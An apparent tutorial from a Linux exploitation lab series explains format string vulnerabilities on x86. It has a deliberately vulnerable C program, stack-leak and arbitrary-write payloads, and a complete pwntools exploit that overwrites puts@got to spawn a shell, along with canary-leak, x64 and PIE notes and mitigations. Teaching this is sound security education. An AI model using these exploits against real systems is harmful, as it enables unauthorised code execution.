Format String Vulnerabilities on x86

A format string bug is a single missing "%s" away from arbitrary read and arbitrary write. When user input reaches printf (or fprintf, sprintf, snprintf, vprintf, syslog, …) as the format argument instead of as a data argument, the conversion specifiers in that input drive what printf does next: walk the stack, dereference pointers as strings, and write integers into memory of your choosing.

Note

Lab Setup: This tutorial uses the vuln binary from the Linux Exploitation Lab (09-format-string-x86/). See the setup guide for build instructions and tool installation.

If building natively, install the required tools and disable ASLR for predictable addresses:
sudo apt install checksec gdb gcc-multilib
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Re-enable ASLR when you’re done: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Note

Examples below use pwntools. Install with pip install pwntools.

What Goes Wrong with `printf(user_input)`

printf is variadic. Its first argument is a format string; subsequent arguments are pulled from the stack (on x86) according to the conversion specifiers it finds. The function has no way to know how many arguments were actually passed: it trusts the format string completely.

Vulnerable:

// vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

__attribute__((used))
void force_system_plt(void) {
    system(":");                // keep system@plt in the lab binary
}

int main(int argc, char **argv) {
    char buf[128];

    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;

    printf(buf);                 // user input is the FORMAT string
    puts("");

    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    puts(buf);                   // second sink we'll hijack later

    return 0;
}

Safe (the same data, but treated as data):

printf("%s", buf);

Compile without PIE, with stack protector, and with FORTIFY explicitly disabled. Leave NX on (it does not stop us) and leave canaries on (the format string bug doesn’t smash the saved return pointer):

gcc -m32 -no-pie -fstack-protector-strong -U_FORTIFY_SOURCE \
    -z noexecstack -o vuln vuln.c

checksec --file=./vuln
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

Note

Why leave the canary on? A format string bug doesn’t need to overflow anything. We will turn it into arbitrary 1- or 2-byte writes into the GOT, which lives in .got.plt, nowhere near the stack, so the canary is never touched. The section on defeating stack canaries below shows the reverse case: a format string bug is the textbook way to leak a canary for a stack overflow elsewhere in the same process.

Warning

Modern glibc gates %n. With glibc’s fortified printf wrappers (enabled by _FORTIFY_SOURCE=2, which many distributions now turn on by default), %n in a writable format string aborts with *** %n in writable segment detected ***. The lab vuln is compiled with -U_FORTIFY_SOURCE, so %n is allowed. Real targets in the wild often have fortify on; the technique still applies to fortify-disabled builds and to format strings stored in read-only segments.

Reading the Stack with `%x` and `%p`

When printf sees %x it pulls the next 4 bytes (on x86) from the argument area and prints them as hex. If you didn’t push an argument, it just keeps walking up the stack.

$ ./vuln
AAAA %x %x %x %x %x %x %x %x
AAAA 80 f7faf580 80485ed 41414141 20782520 25207825 78252078 20782520

Three things to notice:

The first few words are whatever happened to be in the argument slots before printf was called (libc internals, saved register values).
41414141 is our own AAAA — the buffer lives on the stack and we’re reading it back as an “argument”.
After our buffer, printf keeps reading the rest of our format string as data (20782520 is the four bytes " %x " read as a little-endian word).
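
To check which part of the payload a leaked word corresponds to, it helps to turn the hex words back into bytes. The following is a minimal sketch using only the standard library. The helper name words_to_bytes is made up for this illustration, and the words are the 32-bit values that a payload of AAAA followed by repeated " %x" leaves in its own buffer:

```python
import struct

def words_to_bytes(words):
    """Re-pack 32-bit hex words (as printed by %x) into little-endian bytes."""
    return b"".join(struct.pack("<I", int(w, 16)) for w in words)

# Illustrative words: the marker, then the format string read back as data.
leaked = ["41414141", "20782520", "25207825", "78252078"]
print(words_to_bytes(leaked))   # b'AAAA %x %x %x %x'
```

If the decoded bytes spell out your own input, the slot lies inside the buffer.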

Counting %xs gets old fast. Use positional access — the N$ modifier asks for the Nth argument directly:

$ ./vuln
AAAA %1$p %2$p %3$p %4$p %5$p %6$p %7$p %8$p
AAAA 0x80 0xf7faf580 0x80485ed 0x41414141 0x24312520 0x32252070 0x25207024 0x20702433

Our AAAA is at position 4. That number is the offset we’ll use for every subsequent read or write — remember it.

A cleaner way to find your offset, with a recognisable marker:

from pwn import *

r = process('./vuln')
r.sendline(b'BBBB ' + b' '.join(f'%{i}$p'.encode() for i in range(1, 12)))
print(r.recvline().decode())

BBBB 0x80 0xf7faf580 0x80485ed 0x42424242 0x24312520 ...
                              ^^^^^^^^^^
                              position 4
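
Picking the slot out by eye works, but the search is easy to automate. The sketch below parses one line of %p output and returns the first position whose value equals the marker. It assumes the probe line has the shape shown above (marker first, then space-separated %p fields); find_offset is a hypothetical helper, not a pwntools function:

```python
import struct

def find_offset(probe_output, marker=b"BBBB"):
    """Return the 1-based position whose %p value equals the 4-byte marker."""
    want = struct.unpack("<I", marker)[0]          # b"BBBB" -> 0x42424242
    fields = probe_output.split()[1:]              # drop the echoed marker itself
    for position, field in enumerate(fields, start=1):
        # glibc prints a null pointer as "(nil)", so only parse 0x... fields
        if field.startswith("0x") and int(field, 16) == want:
            return position
    return None

line = "BBBB 0x80 0xf7faf580 0x80485ed 0x42424242 0x24312520"
print(find_offset(line))   # 4
```

A result of None means the marker was not among the probed slots; widen the range of positions and try again.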

Note

The exact offset depends on stack layout: how the calling function set up its frame, what was pushed before printf, and whether the buffer is char buf[128] on the stack or a heap pointer. Always re-find the offset for your binary; do not copy literals from a write-up.

Leaking Strings with `%s`

%s does not pull a string off the stack. It pulls a pointer and dereferences it. Combined with positional access, that means: pick any stack slot that contains a pointer to a C string, and %N$s prints what it points to.

The cheap demo: have a known string somewhere on the stack and read it back.

// leak_demo.c
#include <stdio.h>
int main(void) {
    char *secret = "the password is hunter2";
    char buf[64];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);
    return 0;
}

$ ./leak_demo
%1$s %2$s %3$s %4$s %5$s %6$s %7$s
(garbage)... the password is hunter2 ...

Walk positions until you find one that points at a printable string. In a real target you would walk the stack with %p first, identify which slot holds a pointer into .rodata or the heap, then switch to %s for that exact slot.

Reading an arbitrary address is one trick further. Place the address you want to dereference into the format string itself (so it lives on the stack as part of buf) and then read it back as a string with the matching position number:

from pwn import *

target = 0x0804a020          # some address you want to read as a C string
payload = p32(target) + b'|%4$s'
# position 4 is where our buffer starts (we measured this earlier)

r = process('./vuln')
r.sendline(payload)
print(r.recvline())

printf parses the format. When it reaches %4$s, it reads slot 4 of the argument area — which is the first 4 bytes of buf, i.e. our target — and dereferences it as a char *.
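
The same payload can be assembled without pwntools, which makes the byte layout explicit. This is a sketch under the assumptions used above (32-bit little-endian target, buffer at position 4). The helper names build_read and extract_leak are invented here, and the sample response line is made up to show the parsing step:

```python
import struct

def build_read(addr, offset):
    """Raw 4-byte pointer, a '|' separator, then %<offset>$s to dereference it."""
    return struct.pack("<I", addr) + b"|%" + str(offset).encode() + b"$s"

def extract_leak(line, addr):
    """Strip the echoed pointer and separator; what remains is the leaked string."""
    prefix = struct.pack("<I", addr) + b"|"
    if not line.startswith(prefix):
        raise ValueError("unexpected response")
    return line[len(prefix):].rstrip(b"\n")

print(build_read(0x0804a020, 4))                               # b' \xa0\x04\x08|%4$s'
print(extract_leak(b"\x20\xa0\x04\x08|hunter2\n", 0x0804a020)) # b'hunter2'
```

The '|' separator is only there to make the start of the leak easy to find in the response.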

Warning

%s segfaults on bad pointers. If the slot you reference doesn’t contain a readable address, printf dereferences garbage and the process dies. Always verify with %p first that the slot holds a sensible pointer (or, when injecting your own pointer like above, that the address is actually mapped). A crash here also kills the connection in remote scenarios, so you only get one shot.

Writing with `%n`, `%hn`, and `%hhn`

%n is the strange one. It prints nothing; instead it stores the number of characters printed so far through its int * argument.

int n;
printf("hello%n\n", &n);   // n == 5

The width specifiers (%10d, %50c, …) inflate the printed-byte count without needing matching data, and that count is what %n writes. Variants:

Specifier	Argument type	Bytes written
`%n`	`int *`	4
`%hn`	`short *`	2
`%hhn`	`signed char *`	1
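
The narrower variants store only the low bytes of the running count, which is why a count above 65535 (or 255) still produces a usable value. A small model of that truncation follows; stored_value is a hypothetical name, and signedness is ignored because the bytes that land in memory are the same either way:

```python
WIDTH_BITS = {"%n": 32, "%hn": 16, "%hhn": 8}

def stored_value(count, spec):
    """Value that ends up in memory when `count` characters have been printed."""
    return count & ((1 << WIDTH_BITS[spec]) - 1)

print(hex(stored_value(57005, "%hn")))     # 0xdead
print(hex(stored_value(0x1beef, "%hn")))   # 0xbeef (count wrapped past 65535)
print(hex(stored_value(0x1beef, "%hhn")))  # 0xef
```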

To write the value 0xDEAD (decimal 57005) at address X:

[ 4 bytes: X ]%57001c%4$hn
              ^^^^^^^         pad the output up to 57005 characters (4 address bytes + 57001)
                     ^^^^^    write a 2-byte short to slot 4 (which is X)

The 4 address bytes at the front are printed too, so they count toward the total; the pad is 57005 - 4 = 57001. printf happily prints 57001 bytes of padding. That’s about 57 KB to the screen, which is fine. To write a full 32-bit value (say 0xdeadbeef), do not use a single %n with a 3.7-billion-byte field; split it into two %hn writes at X and X+2:

write low half  (0xbeef = 48879) at X
write high half (0xdead = 57005) at X+2

The trick is that printf only ever increases its character count. Order the writes so each width specifier is the additional bytes needed since the last write, not the absolute total, and remember that the two staged pointers (8 bytes) are printed first. Smaller half first:

[X][X+2]              -> count = 8 (raw pointer bytes)
%48871c%4$hn          -> count = 48879, write 0xbeef at X
%8126c%5$hn           -> count = 57005, write 0xdead at X+2
                              (48871 = 48879 - 8, 8126 = 57005 - 48879)

Each %hn consumes a positional slot; you need two pointers (X and X+2) staged on the stack, hence two slot numbers.
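
The arithmetic for a two-write payload can be sketched in a few lines. This version assumes the two pointers are staged at the very start of the buffer (so they occupy slots offset and offset + 1 and contribute 8 printed bytes) and that neither pointer contains a null or newline byte. two_short_writes is an illustrative helper, not a library function:

```python
import struct

def two_short_writes(addr, value, offset):
    """Build [addr][addr+2] followed by two %hn writes, smaller half first."""
    header = struct.pack("<II", addr, addr + 2)
    halves = [(value & 0xffff, offset),        # low half goes to addr
              (value >> 16, offset + 1)]       # high half goes to addr + 2
    count = len(header)                        # the pointers are printed too
    fmt = b""
    for half, slot in sorted(halves):
        pad = (half - count) % 0x10000         # extra characters still needed
        if pad:
            fmt += b"%%%dc" % pad
        fmt += b"%%%d$hn" % slot
        count += pad
    return header + fmt

print(two_short_writes(0x0804c014, 0xdeadbeef, 4))
# b'\x14\xc0\x04\x08\x16\xc0\x04\x08%48871c%4$hn%8126c%5$hn'
```

Sorting by value keeps every pad positive; the modulo only matters when a half is smaller than the number of bytes already printed.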

Note

Doing this math by hand is unpleasant and error-prone (off-by-ones in the slot numbers, the slot containing a pointer landing inside the padded field, etc.). pwntools has a helper that does exactly this, covered in the next section.

GOT Overwrite to Redirect Execution

Strategy: overwrite puts@got with the address of system@plt. After the write, the program’s second puts(buf) call dereferences the GOT, lands at system@plt instead, and system(buf) runs whatever is in buf. Pass /bin/sh as that second line of input and you have a shell.

We need two addresses, both fixed because the binary is non-PIE: the GOT slot of puts and the PLT stub of system.

$ objdump -R ./vuln | grep -E 'puts|system'
0804c014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c018 R_386_JUMP_SLOT   system@GLIBC_2.0

$ objdump -d -j .plt ./vuln | grep -A1 '<system@plt>'
08049090 <system@plt>:
 8049090:  ff 25 18 c0 04 08    jmp    *0x804c018

Each PLT stub jumps through its own GOT slot: puts@plt reads the pointer at 0x0804c014, system@plt reads the pointer at 0x0804c018. The exploit doesn’t touch system’s GOT entry; it overwrites the pointer at puts@got so that the next call through puts@plt lands on system@plt instead of libc’s puts.

puts_got    = 0x0804c014   # the GOT slot we will overwrite
system_plt  = 0x08049090   # the value we will write into it

(addresses are from this lab build; read your own binary — they vary by toolchain)

We want the 4 bytes at puts_got to become 0x08049090. Split:

low half  = 0x9090   at puts_got
high half = 0x0804   at puts_got + 2

What `fmtstr_payload` does

pwntools ships fmtstr_payload(offset, writes) where writes is a dict mapping target address to value. It:

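Plans a sequence of %hhn or %hn writes whose cumulative byte counts are monotonically increasing.
Stages the target addresses inside the payload so they sit at known positions on the stack. Older pwntools releases put them at the front as a header; recent releases append them after the format directives, so a null byte in an address cannot cut the directives short.
Emits %Nc padders and %K$hhn (or %K$hn) writers in the right order, where K is the slot number of each staged address.

Roughly, for our case a header-first layout with two %hn writes looks like:

[puts_got] [puts_got+2] %<pad1>c %<offset+1>$hn %<pad2>c %<offset>$hn

(the high half 0x0804 is smaller than the low half 0x9090, so it is written first; the default byte-wise mode stages four addresses and uses four %hhn writes instead)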

You almost never want to write this by hand once you know what’s happening underneath. Use the helper.
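
For intuition only, here is a sketch of a byte-wise plan for the puts_got write. It is not the algorithm pwntools uses: it writes the bytes in address order and relies on the count wrapping modulo 256, and it ignores any bytes printed before the first pad unless you pass them in. plan_byte_writes and its already_printed parameter are hypothetical names:

```python
def plan_byte_writes(addr, value, already_printed=0):
    """Return (target address, byte to store, padding to print) for 4 %hhn writes."""
    count = already_printed
    plan = []
    for i in range(4):
        byte = (value >> (8 * i)) & 0xff
        pad = (byte - count) % 256      # %hhn keeps only the low 8 bits of the count
        plan.append((addr + i, byte, pad))
        count += pad
    return plan

for target, byte, pad in plan_byte_writes(0x0804c014, 0x08049090):
    print(hex(target), hex(byte), pad)
# 0x804c014 0x90 144
# 0x804c015 0x90 0
# 0x804c016 0x4 116
# 0x804c017 0x8 4
```

The whole write costs 264 padding characters, compared with tens of thousands for the %hn version.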

Complete exploit

#!/usr/bin/env python3
# exploit.py
from pwn import *

context.binary = elf = ELF('./vuln')

puts_got   = elf.got['puts']
system_plt = elf.plt['system']

# Find the offset to our buffer first (one-shot probe).
# We measured offset = 4 for this binary in the earlier section.
offset = 4

payload = fmtstr_payload(offset, {puts_got: system_plt})
log.info('payload length: {}'.format(len(payload)))

r = process('./vuln')
r.sendline(payload)              # first fgets -> printf(buf) executes the writes
r.recvuntil(b'\n')               # consume printf output (and the puts(""))
r.sendline(b'/bin/sh')           # second fgets -> puts(buf) is now system(buf)
r.interactive()

$ python3 exploit.py
[*] payload length: 44
[+] Starting local process './vuln': pid 30421
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

The first line of input is consumed entirely by the format string parser inside printf; its output (mostly garbage and padding) goes to stdout but does no harm. Once printf returns, puts@got no longer points into libc — it points at system@plt. The second puts(buf) call is now system("/bin/sh").

The tiny force_system_plt() helper in the lab source exists only so the linker emits a system@plt stub. Real targets often do not import system; in that case you need a libc leak and you overwrite the GOT entry with the resolved libc address of system instead. See the Return-to-libc tutorial for that leak step.

Why one-byte writes scale better

A single %n with 0xdeadbeef would print ~3.7 billion characters before writing. %hn caps the printed-byte count between writes at 65535; %hhn caps it at 255. fmtstr_payload defaults to %hhn (4 writes for a 32-bit address) precisely so the printed output stays small even when target bytes are at opposite ends of the value range.
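
The difference is easy to quantify. If the chunks of a value are written smallest first, the total number of characters printed equals the largest chunk (ignoring the few bytes taken by the staged addresses). A rough model, with output_cost as an invented helper name:

```python
def output_cost(value, width_bits):
    """Characters printed to write a 32-bit value in chunks, smallest chunk first."""
    mask = (1 << width_bits) - 1
    chunks = [(value >> shift) & mask for shift in range(0, 32, width_bits)]
    return max(chunks)   # the ascending running count ends at the largest chunk

for spec, bits in (("%n", 32), ("%hn", 16), ("%hhn", 8)):
    print(spec, output_cost(0xdeadbeef, bits))
# %n 3735928559
# %hn 57005
# %hhn 239
```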

Defeating Stack Canaries by Leaking Them

If the same process has both a format string bug and a separate stack overflow, the format string is the canary’s lockpick. The canary is a random value chosen once per process (glibc keeps the reference copy in thread-local storage) and placed on the stack between local buffers and the saved return address:

gdb-peda$ x/wx $ebp-0x4
0xbffff21c:  0x83b6dc00       <- the canary

%p reads it just like any other stack slot:

$ ./vuln
%17$p
0x83b6dc00

(The slot number depends on the function’s local layout. Walk %p to find the value that ends in 00: glibc deliberately makes the low byte of every canary a null so that string functions such as strcpy stop at it.)

Once you have the value, send a second payload that overflows the buffer but writes the leaked canary back into its original slot before continuing past it. Saved EBP and EIP after the canary are then yours as usual.
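
As a sketch of that second payload: the distances below (64 bytes from the buffer to the canary, 12 bytes from the canary to the saved return address) are placeholders invented for illustration and must be measured in a debugger for the real target. The helper names are hypothetical too:

```python
import struct

def parse_canary(leak_text):
    """Turn a %p leak such as '0x83b6dc00' into an int, checking the 00 low byte."""
    value = int(leak_text.strip(), 16)
    if value & 0xff != 0:
        raise ValueError("low byte is not 00; probably not the canary")
    return value

def overflow_payload(canary, new_eip, buf_to_canary, canary_to_eip):
    """Filler up to the canary, the canary itself, filler up to EIP, then EIP."""
    return (b"A" * buf_to_canary
            + struct.pack("<I", canary)
            + b"B" * canary_to_eip
            + struct.pack("<I", new_eip))

canary = parse_canary("0x83b6dc00")
payload = overflow_payload(canary, 0x08049090, buf_to_canary=64, canary_to_eip=12)
print(len(payload))   # 84
```

Because the canary starts with a null byte in memory, this only works through an overflow that copies raw bytes (read, fgets, memcpy), not through strcpy.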

The full canary-bypass walkthrough is the next tutorial in this series; this section is just to underline that a format string bug undermines every stack-side mitigation in the same process.

Why x64 Is Harder

x86 passes all variadic arguments on the stack, so printf’s “next argument” pointer marches straight through the same memory your buffer lives in. Positional access at %4$p reads stack slot 4, full stop.

The System V AMD64 ABI passes the first six integer/pointer arguments in registers (rdi, rsi, rdx, rcx, r8, r9). For printf, rdi holds the format string itself; the remaining five register slots are whatever the compiler last loaded. printf reads those five register slots first as positions 1-5, then starts reading the stack at position 6.

Practical consequences:

%1$p through %5$p give you register garbage, not your buffer.
Your buffer (if it’s on the stack) typically begins around %6$p, sometimes later if the function has many locals.
Padding offsets in fmtstr_payload shift accordingly. pwntools handles this if you set context.arch = 'amd64', but the offset you measure will be 6+ rather than 4.
Address writes are 8 bytes wide, so fmtstr_payload plans 8 %hhn writes per target instead of 4. Printed-byte counts are still bounded by the 0-255 range per write.

A toy x64 walk:

context.arch = 'amd64'
r.sendline(b'AAAAAAAA ' + b' '.join(f'%{i}$p'.encode() for i in range(1, 12)))
# AAAAAAAA  0x... 0x... 0x... 0x... 0x... 0x4141414141414141 ...
#                                          ^ position 6
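
The position-to-location mapping described above can be written down directly. This sketch covers integer and pointer conversions only (floating-point arguments travel in separate registers), and rsp here means the stack pointer as the caller sees it at the call to printf. amd64_source is a hypothetical helper:

```python
REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]   # rdi already holds the format string

def amd64_source(position):
    """Where printf fetches positional argument N from under the System V AMD64 ABI."""
    if position < 1:
        raise ValueError("positions start at 1")
    if position <= len(REGISTERS):
        return REGISTERS[position - 1]
    return f"[rsp+{(position - 6) * 8:#x}]"

for n in (1, 5, 6, 8):
    print(n, amd64_source(n))
# 1 rsi
# 5 r9
# 6 [rsp+0x0]
# 8 [rsp+0x10]
```

Read the other way round, a buffer that starts k bytes above rsp begins at position 6 + k // 8.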

Everything else carries over: same %n family, same GOT-overwrite plan, same pwntools helper. Just expect higher offsets and longer payloads.

Key Concepts

Why this works

printf trusts the format string to describe its own arguments.
When the format string is user-controlled, every conversion specifier becomes a primitive: %x/%p for read, %s for indirect read, %n/%hn/%hhn for write.
Positional access (%N$) means we don’t need to consume the entire argument area to reach a specific slot.
The GOT is writable on Partial RELRO binaries — one well-aimed %hn redirects every subsequent call through it.

Mitigations that actually help

Full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only after relocation; a %n write into it faults instead of redirecting execution.
_FORTIFY_SOURCE rejects %n in writable format strings at runtime.
-Wformat -Wformat-security flags printf(buf) at compile time. Treat it as an error in CI.
Don’t pass user input as a format string. Always printf("%s", buf).

Troubleshooting

`*** %n in writable segment detected ***`

The target was compiled with _FORTIFY_SOURCE, so its printf calls go through glibc’s checked variants. Either rebuild the target without -D_FORTIFY_SOURCE, or move the format string into a read-only segment (which a real attacker rarely controls). The lab binary should be built with -U_FORTIFY_SOURCE -O0 to keep %n enabled.

Crash inside `printf`

Almost always a bad %s. Walk the stack with %p first and only dereference slots that look like valid pointers into mapped regions. If you injected your own pointer into the format string, double-check endianness and make sure the address itself doesn’t contain a newline (0x0a), which ends the fgets read, or a null byte, which ends the format string as printf parses it.

Wrong offset

The offset is per-binary and per-call-site. A buffer on main’s stack and a buffer on a deeper function’s stack will sit at different positions. Re-measure when the call site changes; don’t reuse offsets between binaries.

`fmtstr_payload` produces a payload that includes null bytes

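fmtstr_payload emits ASCII format directives, but the target addresses it embeds are raw 32-bit/64-bit pointers and may contain 0x00 (64-bit user-space addresses always do). printf stops parsing the format at the first null byte, so a pointer containing one must come after every directive; recent pwntools releases place the pointers at the end of the payload for this reason. The input path imposes its own bad bytes: fgets and gets stop at a newline (0x0a), scanf("%s", ...) stops at any whitespace byte, and a strcpy between the read and the printf truncates at the first null. read has no such restriction. If an address contains a byte the input path cannot carry, recent pwntools versions accept a badbytes argument to fmtstr_payload (check the documentation for your installed version), or you can stash the address pointers via an alternate route.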
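
A quick pre-flight check catches these problems before the payload is sent. The table of stop bytes below reflects the standard behaviour of each C input function; the reader labels and the helper names cut_index and format_end are invented for this sketch:

```python
STOP_BYTES = {
    "fgets":   b"\n",
    "gets":    b"\n",
    "scanf_s": b" \t\n\v\f\r",   # scanf("%s") stops at any whitespace byte
    "read":    b"",              # read() copies every byte
}

def cut_index(payload, reader):
    """Index of the first byte at which the input function stops, or None."""
    stops = STOP_BYTES[reader]
    for i, byte in enumerate(payload):
        if byte in stops:
            return i
    return None

def format_end(payload):
    """Index of the first null byte, where printf stops parsing, or None."""
    i = payload.find(b"\x00")
    return None if i < 0 else i

print(cut_index(b"\x14\xc0\x04\x08%4$hn", "fgets"))           # None
print(cut_index(b"AAAA %p", "scanf_s"))                        # 4
print(format_end(b"\x18\x10\x60\x00\x00\x00\x00\x00%6$s"))     # 3
```

In the last case the %6$s directive sits after a null byte, so printf never reaches it; the pointer has to move behind the directive.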

Binary is PIE

You cannot hardcode puts_got or system_plt. Leak a code or libc address first (the format string itself is a perfect leak primitive: dump enough %p slots to find a saved return into the binary, subtract the known offset to get the binary base, then compute puts_got and system_plt from there). Only after the leak can you build the GOT-overwrite payload.
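
The rebasing step is plain arithmetic. In the sketch below every number is a made-up placeholder: the leaked return address, its offset inside the binary, and the offsets of puts@got and system@plt would all come from your own leak and from objdump or pwntools on your own build. rebase is a hypothetical helper:

```python
PAGE_SIZE = 0x1000

def rebase(leaked_ret, ret_offset, symbol_offsets):
    """Derive the load base from one leaked code address, then rebase symbols."""
    base = leaked_ret - ret_offset
    if base % PAGE_SIZE:
        raise ValueError("base is not page-aligned; wrong slot or wrong offset")
    return base, {name: base + off for name, off in symbol_offsets.items()}

# Placeholder values for illustration only.
base, addrs = rebase(0x565561ed, 0x11ed, {"puts_got": 0x4014, "system_plt": 0x1090})
print(hex(base))                  # 0x56555000
print(hex(addrs["puts_got"]))     # 0x56559014
print(hex(addrs["system_plt"]))   # 0x56556090
```

The page-alignment check is a cheap sanity test: a base that is not a multiple of 0x1000 means the leaked slot was not the return address you thought it was.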
